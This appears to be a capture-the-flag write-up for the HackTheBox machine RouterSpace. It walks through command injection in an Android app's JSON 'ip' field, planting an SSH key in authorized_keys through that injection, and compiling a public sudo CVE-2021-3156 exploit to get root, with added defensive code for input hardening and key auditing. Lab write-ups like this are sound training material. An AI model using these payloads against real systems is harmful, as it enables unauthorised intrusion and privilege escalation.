
HackTheBox - RouterSpace


Initial configuration for this machine was very annoying, but once I got anbox working correctly it was rather straightforward.


└─# nmap -Pn -sV -sC
Starting Nmap 7.92 ( ) at 2022-03-07 16:19 GMT
Nmap scan report for routerspace.htb (
Host is up (0.17s latency).
Not shown: 998 filtered tcp ports (no-response)
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-46773
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 70
|     ETag: W/"46-mfBDzdyJQiAB5GVUFd3LcNfMcC0"
|     Date: Mon, 07 Mar 2022 16:20:22 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: qD Vc jdX7z c 6d1 }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-36383
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 07 Mar 2022 16:20:21 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-19862
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 07 Mar 2022 16:20:21 GMT
|     Connection: close
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 80.07 seconds

From nmap, we can see SSH on port 22 and an HTTP server on port 80. Browsing to the website, we are met with the following landing page:


The site displays information on an application called RouterSpace, which can connect routers to routerspace. The site allows us to download routerspace.apk, an Android application.

Installing the APK

Originally, I tried to do this using genymotion; however, I was unsuccessful in capturing any requests from the application in burp. Due to this, I changed to anbox, and had much more success.

Installing Anbox

I used the following guide to install anbox on my Kali VM:

I also downloaded the recommended anbox android image from:

Once anbox was installed, I installed the routerspace.apk package into anbox using:

adb install routerspace.apk

I then launched anbox, ran routerspace and was presented with an application screen with a “Check Status” button:


So I decided to try and capture the request with burp.


After launching burp, I went to Proxy Options > Proxy Listeners. I added a listener on port 8000, using my tun0 IP address.


Now I needed to add the burp proxy to anbox, and I did this using:

adb shell settings put global http_proxy

Now when clicking “Check Status”, burp caught the POST request and returned the following:


I then sent this request to repeater, and played around with the request. By editing the JSON ip field, and inputting a ;, I was able to input a command and the remote target would execute it. For this POST request, I used "IP":";whoami", and in the response received "\npaul\n".
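Why the `;` works, and the server-side fix, as an added example that is not RouterSpace's code (the page never shows the handler). `check_status_vulnerable`, `check_status_hardened` and `STATUS_TOOL` are hypothetical names, a harmless `echo` stands in for whatever command the real endpoint runs, and the marker payload is constructed.

```python
import ipaddress
import subprocess
import sys

# Hypothetical stand-in for the tool the real endpoint runs (not shown on the
# page): a child process that only reports the argument it was given.
STATUS_TOOL = [sys.executable, "-c", "import sys; print('checked', sys.argv[1])"]


def check_status_vulnerable(ip):
    """Before: the request field is pasted into a shell command line."""
    cmd = "echo checked " + ip  # the shell treats ';' as a command separator
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def check_status_hardened(ip):
    """After: strict parse of the field, then an argv list with no shell."""
    # JSON numbers would otherwise be accepted: ip_address(1) is 0.0.0.1.
    if not isinstance(ip, str):
        raise ValueError("ip must be a string")
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        raise ValueError("ip must be a literal IPv4 or IPv6 address") from None
    # Each list element reaches the child as one argument; nothing parses ';'.
    done = subprocess.run(STATUS_TOOL + [str(addr)], capture_output=True,
                          text=True, check=True, timeout=10)
    return done.stdout


if __name__ == "__main__":
    payload = "127.0.0.1;echo INJECTED"  # constructed, same shape as ";whoami"
    print(repr(check_status_vulnerable(payload)))
    for value in ("127.0.0.1", payload, 1):
        try:
            print(repr(check_status_hardened(value)))
        except ValueError as err:
            print("rejected:", err)
```

Validation and the argv list are two separate layers: the parse rejects anything that is not an address, and dropping the shell means a missed case still cannot become a second command.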

Knowing that the user is Paul, let's have a look inside his directory:


We can see a user.txt, but when trying to cat it, the resulting hash is the incorrect flag.

Exploiting RouterSpace

From here, I tried executing different commands to attempt to launch a reverse shell, but I was unable to. This got me thinking about a potential SSH foothold, due to port 22 being open. Let's see if Paul has a .ssh directory: "ip":";ls -la /home/paul/.ssh"


There is a .ssh directory, but there is no public id_rsa key within it, which means I can potentially add my own, and then SSH into the target host.

SSH Key Generation

To generate the keys needed, I ran ssh-keygen within the .ssh directory.

└─# ssh-keygen                                                                             
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa
Your public key has been saved in
The key fingerprint is:
SHA256:yEFblsfeIJdPKDEX6Xo1saLB0SZuwo60ARI3wetYseU root@NTAKali
The key's randomart image is:
+---[RSA 3072]----+
|.o+.  . ==o=     |
|..+... +*o@ o    |
| . B .oo @ = o   |
|  + E.oo= + *    |
| + . =ooS+ o .   |
|. . o . o .      |
|         .       |
|                 |
|                 |

And now below we can see our key.

└─# ls                                                                                     

└─# cat
ssh-rsa <Generated Key> root@NTAKali

Adding key to target host

Using burp, I can echo the key into the .ssh directory, in a file called authorized_keys using:

{"ip":";echo '<Generated Key>' >> /home/paul/.ssh/authorized_keys"}


As we can see from the image below, the file was created. However, as a Brit, I spelt the directory wrong and used an s instead of a z - Oops.


From here, I re-uploaded the key to the correct directory, and attempted to connect via SSH.

└─# ssh paul@                                                             
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Tue 08 Mar 2022 12:22:28 AM UTC

  System load:           0.0
  Usage of /:            70.5% of 3.49GB
  Memory usage:          17%
  Swap usage:            0%
  Processes:             214
  Users logged in:       0
  IPv4 address for eth0:
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f84a

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Nov 20 18:30:35 2021 from
paul@routerspace:~$ whoami


Once SSH’d in, it’s as simple as reading the user.txt file.

paul@routerspace:~$ cat user.txt
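The foothold above depends on a line appended to /home/paul/.ssh/authorized_keys going unnoticed. As an added example (not part of the original post), this audit fingerprints every entry the way ssh-keygen does and reports any that are not on an approved list; the key blobs, the `paul@laptop` comment and the approved set are constructed for the sample.

```python
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def fingerprint(blob_b64):
    """SHA256 fingerprint as ssh-keygen prints it (base64 without padding)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit(text, approved):
    """Return (line_no, fingerprint_or_reason, comment) for unapproved entries."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as from="..." may precede the key type, so search for it.
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            findings.append((no, "malformed", line[:40]))
            continue
        try:
            fp = fingerprint(fields[idx + 1])
        except ValueError:  # binascii.Error (bad base64) is a ValueError
            findings.append((no, "malformed", line[:40]))
            continue
        if fp not in approved:
            findings.append((no, fp, " ".join(fields[idx + 2:])))
    return findings


def demo_blob(seed):
    """Constructed Ed25519-shaped key blob for the sample (not a real key)."""
    raw = (struct.pack(">I", 11) + b"ssh-ed25519" +
           struct.pack(">I", 32) + hashlib.sha256(seed).digest())
    return base64.b64encode(raw).decode()


ADMIN, UNKNOWN = demo_blob(b"admin"), demo_blob(b"unknown")
APPROVED = {fingerprint(ADMIN)}
# Constructed authorized_keys content; the last two lines are the anomalies.
SAMPLE = "\n".join(["# constructed sample", f"ssh-ed25519 {ADMIN} paul@laptop",
                    f'from="10.0.0.5" ssh-ed25519 {UNKNOWN} root@NTAKali',
                    "ssh-rsa not-base64!! broken"])
```

Calling `audit(SAMPLE, APPROVED)` returns the unapproved key on line 3 and the malformed entry on line 4; run against real files, the same check belongs in a scheduled job or file-integrity alert for every account's authorized_keys.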

Privilege Escalation

Once I had gained a foothold, I attempted to download on the target host. However, after setting up the python server, the target host was unable to connect to it to download the file.

paul@routerspace:~$ wget
--2022-03-08 00:34:13--
Connecting to ^C

Instead, I can use Secure Copy (scp) to upload the file from my local host to the target host over port 22.

scp -P 22 ../Desktop/ paul@


Initially, I attempted to use PwnKit on the machine, as linpeas recommended it.

╔══════════╣ Executing Linux Exploit Suggester
[+] [CVE-2021-4034] PwnKit                                                                        

   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit

   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL:

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL:
   Comments: ip_tables kernel module must be loaded

After looking through linpeas again, I noticed that the host is running a vulnerable version of sudo, 1.8.31, but for some reason linpeas didn’t report the CVE issue. One way to test whether sudo is vulnerable to CVE-2021-3156 is to run sudoedit -s /; if sudo asks for the user's password, it is likely vulnerable.

After googling exploits related to the CVE, I decided to use the following exploit:

After downloading the file to my host machine and unzipping it, I transferred the files over via scp like before. Afterwards, I ran make, which created an exploit executable. Running this executable elevated me to root!

paul@routerspace:~/test$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/ shellcode.c
cc -O3 -o exploit exploit.c
paul@routerspace:~/test$ ls
exploit  exploit.c  libnss_x  Makefile  shellcode.c
paul@routerspace:~/test$ ./exploit
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)


Moving to the root directory, we find the root text file.

# ls
# cat root.txt  
This post is licensed under CC BY 4.0 by the author.